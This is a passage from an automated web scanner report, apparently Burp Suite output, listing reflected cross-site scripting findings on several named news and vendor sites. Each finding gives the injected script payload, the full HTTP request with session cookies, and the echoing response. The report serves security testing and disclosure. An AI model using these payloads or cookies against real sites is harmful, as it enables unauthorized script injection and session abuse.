This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /btgcommunity/forum.jspa?96de6"><script>alert(1)</script>f434820df34=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292121547041; PHPSESSID=8efl2fv5lkgca0bau3me2u8bb0; s_nr=1292111961290; s_lv_s=Less%20than%201%20day; iwa_user_login_check=OGVmbDJmdjVsa2djYTBiYXUzbWUydThiYjA%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C26B3C12268F5DEF282B10D2E395C0F4; Path=/btgcommunity
Set-Cookie: jive.vid=27tlKol1Bk97T7mG; Expires=Tue, 11-Jan-2011 03:26:01 GMT; Path=/btgcommunity
Last-Modified: Sun, 12 Dec 2010 03:26:01 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Sun, 12 Dec 2010 03:26:00 GMT
Connection: close


<!-- Jive CateogoryID-->
<!-- Title: article template -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<HEAD>
<!--SiteCatalyst code version: G.7. Copyright 1997-2004 Omniture,
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/btgcommunity/style/style.jsp;jsessionid=C26B3C12268F5DEF282B10D2E395C0F4?96de6"><script>alert(1)</script>f434820df34=1" />
...[SNIP]...

3.31. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 97bf6<script>alert(1)</script>ce98c0e5329 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?97bf6<script>alert(1)</script>ce98c0e5329=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=2c8721f60b408028ff0a521ff086c702; nexus_pass_hash=6a43be0d8d6bac7e79eaa27880a0de35; hblid=jr3ebwkizaguwah92qwsrp8n; __utmz=61175156.1288030225.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ip%20board%20software; PAPVisitorId=55d051878521362728ab8250f27596b0; __utma=61175156.215013314.1285176093.1288056663.1292123324.4; SnapABugRef=http%3A%2F%2Fwww.invisionpower.com%2F%20; __utmc=61175156; nexus_member_id=67010; __utmb=61175156.5.10.1292123324;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:15:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?97bf6<script>alert(1)</script>ce98c0e5329=1
</div>
...[SNIP]...

3.32. https://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.invisionpower.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4420d<script>alert(1)</script>6c7af06f3e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?4420d<script>alert(1)</script>6c7af06f3e6=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=2c8721f60b408028ff0a521ff086c702; nexus_pass_hash=6a43be0d8d6bac7e79eaa27880a0de35; hblid=jr3ebwkizaguwah92qwsrp8n; __utmz=61175156.1288030225.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ip%20board%20software; PAPVisitorId=55d051878521362728ab8250f27596b0; __utma=61175156.215013314.1285176093.1288056663.1292123324.4; SnapABugRef=http%3A%2F%2Fwww.invisionpower.com%2F%20; __utmc=61175156; nexus_member_id=67010; __utmb=61175156.5.10.1292123324;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:20:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       <title>Invision Power Services :: 404 File Not Found</ti
...[SNIP]...
<br />
/index.php?4420d<script>alert(1)</script>6c7af06f3e6=1
</div>
...[SNIP]...

3.33. http://www.lightreading.com/quote.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lightreading.com
Path:   /quote.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69500'-alert(1)-'bf0a47d49d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /quote.asp?69500'-alert(1)-'bf0a47d49d7=1 HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lightreading%5Fvisits=2; s_cc=true; _bizo_cksm_crc32=3AF13A5B; s_sq=%5B%5BB%5D%5D; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM; seen=true;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:35:53 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 228372
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence
...[SNIP]...
text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Flightreading%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%2669500'-alert(1)-'bf0a47d49d7%3D1&Type=page&Client=lightreading&rand=' + Math.random();
head.appendChild(script);
</script>
...[SNIP]...

3.34. http://www.techcareers.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.techcareers.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 85d07><a>b049a84fe02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?85d07><a>b049a84fe02=1 HTTP/1.1
Host: www.techcareers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38127
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=CALIFORNIA&HTTPREFERRER=&USERGID=661295971427432086&USERCOUNTRY=US&CookieVersion=1%2E8&PARTNER=TECHCAREERS; expires=Sun, 11-Dec-2011 05:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=CE06C990%2D87A0%2D48F0%2DA28B%2DEE24AAB980F1; path=/
Set-Cookie: ASPSESSIONIDAQDDQTBB=FDJCEPKBHILMLNFMFPMDCAMD; path=/
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:36:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Emulat
...[SNIP]...
path=http://www.techcareers.com&r_industryid=23&r_partnerid=883701&r_partnersitename=TechCareers&t_pgid=423542292661451124&t_sn=/Default.asp&t_httph=www.techcareers.com&t_httpurl=/Default.asp&t_httpqs=85d07><a>b049a84fe02=1&t_sgid=205430751450461325&t_ws=COLO-WEB13&t_ugid=661295971427432086&f_ip=174.121.222.18&ud=&isframe=true width=336 height=280 frameborder=0 scrolling=no marginheight=0 marginwidth=0 valign=bottom al
...[SNIP]...

3.35. http://www.techcareers.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.techcareers.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 22f76><a>9363aa6a588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?22f76><a>9363aa6a588=1 HTTP/1.1
Host: www.techcareers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38127
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=CALIFORNIA&HTTPREFERRER=&USERGID=771222156774489298&USERCOUNTRY=US&CookieVersion=1%2E8&PARTNER=TECHCAREERS; expires=Sun, 11-Dec-2011 05:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=9A1344C5%2D6225%2D4D1B%2DA8CA%2D0527A11C4CDC; path=/
Set-Cookie: ASPSESSIONIDAQDDQTBB=IBJCEPKBOIFPHLGNPJIKGINM; path=/
X-Powered-By: ASP.NET
Date: Sun, 12 Dec 2010 03:35:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Emulat
...[SNIP]...
path=http://www.techcareers.com&r_industryid=23&r_partnerid=883701&r_partnersitename=TechCareers&t_pgid=438613318140440886&t_sn=/Default.asp&t_httph=www.techcareers.com&t_httpurl=/Default.asp&t_httpqs=22f76><a>9363aa6a588=1&t_sgid=627943037487452626&t_ws=COLO-WEB13&t_ugid=771222156774489298&f_ip=174.121.222.18&ud=>
...[SNIP]...

3.36. http://www.techweb.com/css/everything_packed.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.techweb.com
Path:   /css/everything_packed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 371d5"><script>alert(1)</script>40a8f1321c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /css371d5"><script>alert(1)</script>40a8f1321c1/everything_packed.css HTTP/1.1
Host: www.techweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122948162; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1292122948132; PHPSESSID=1151rhqg9v4tkovt5t933m3rg6; s_lv_s=First%20Visit; __qca=P0-1771014900-1292122947029;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:36:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" class="gecko firefox fir
...[SNIP]...
//login.techweb.com/cas/login?service=http%3A%2F%2Fwww.techweb.com%2Fcss371d5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E40a8f1321c1%2F&siteId=300001&successfulLoginRedirect=http://www.techweb.com/css371d5"><script>alert(1)</script>40a8f1321c1/">
...[SNIP]...

3.37. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad2eb"-alert(1)-"361ecd0189a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/adServerESI.aspx?bannerID=160683&siteID=197028858&creativeID=142745208 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: ad2eb"-alert(1)-"361ecd0189a
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBanners1946=161858; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAILastHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAICampaignCounter1946=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners1946=161858,161857; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter161857=1; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit1946=12%2f11%2f2010+9%3a49%3a13+PM; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter1946=2; domain=.insightexpressai.com; expires=Fri, 11-Dec-2015 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Sun, 12 Dec 2010 03:13:53 GMT
Pragma: no-cache
Date: Sun, 12 Dec 2010 03:13:53 GMT
Connection: close
Cache-Control: no-store
Content-Length: 1864


(function() {var InsightExpress={}; InsightExpress.DomainName = 'core.insightexpressai.com';InsightExpress.BannerID=161857;InsightExpress.CampaignID=1946; InsightExpress.AddProps=function(c,p
...[SNIP]...
InviteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=ad2eb"-alert(1)-"361ecd0189a&siteID=197028858&creativeID=142745208";document.getElementsByTagName('head')[0].appendChild(s);}})();

3.38. http://login.cmp.com/user/login.jhtml [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.cmp.com
Path:   /user/login.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9853f"-alert(1)-"776dff61f8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/login.jhtml HTTP/1.1
Host: login.cmp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9853f"-alert(1)-"776dff61f8
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:24:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:24:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=QPE3EKAGAMKRHQE1GHOSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 12485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>
<!--SiteCatalyst code ver
...[SNIP]...

var s_prop1="";
var s_prop2="";
var s_prop3="";
var s_prop4="";
var s_prop5="";
var s_prop6="";
var s_prop7="";
var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9853f"-alert(1)-"776dff61f8";
var s_prop9="";
var s_prop10="";
var s_prop11="";
var s_prop12="";
var s_prop14="";
var s_prop15="";
var s_prop16="";
var s_prop19="False";

/* E-commerce Variables */
var s_campaign="";
...[SNIP]...

3.39. http://login.cmp.com/user/register.jhtml [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.cmp.com
Path:   /user/register.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef489"-alert(1)-"68a53babb52 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user/register.jhtml HTTP/1.1
Host: login.cmp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef489"-alert(1)-"68a53babb52
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:24:30 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:24:30 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=QPOZO2DKLFOGJQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 88437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>
<!--SiteCatalyst code ver
...[SNIP]...

var s_prop1="";
var s_prop2="";
var s_prop3="";
var s_prop4="";
var s_prop5="";
var s_prop6="";
var s_prop7="";
var s_prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef489"-alert(1)-"68a53babb52";
var s_prop9="";
var s_prop10="";
var s_prop11="";
var s_prop12="";
var s_prop14="";
var s_prop15="";
var s_prop16="";
var s_prop19="False";

/* E-commerce Variables */
var s_campaign="";
...[SNIP]...

3.40. http://windows7.informationweek.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://windows7.informationweek.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5306a"-alert(1)-"0010e129662 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: windows7.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5306a"-alert(1)-"0010e129662
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:25:26 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 03:25:26 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=M3YUGJX20SBJHQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 19586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5306a"-alert(1)-"0010e129662";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";

/* Conversion Variables */
s.campaign="";
s.state="";
s.zip=""
...[SNIP]...

3.41. http://www.contentinople.com/author.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.contentinople.com
Path:   /author.asp

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffa57"-alert(1)-"1087ae47ce0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /author.asp HTTP/1.1
Host: www.contentinople.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffa57"-alert(1)-"1087ae47ce0
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Sun, 12 Dec 2010 03:26:09 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 133107
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<META name="keywords" content="Advertising, AOL, Apple, Audio, Babelgum, Content Delivery Network (CDN), Disney, Digital
...[SNIP]...
;
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ffa57"-alert(1)-"1087ae47ce0";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop13="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop20="";

/* E-commerce Variables */
s.campaign="";
s.state
...[SNIP]...

3.42. http://www.darkreading.com/blog/archives/evil_bytes/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.darkreading.com
Path:   /blog/archives/evil_bytes/index.html

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cee22"-alert(1)-"2fc9cff2b63 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

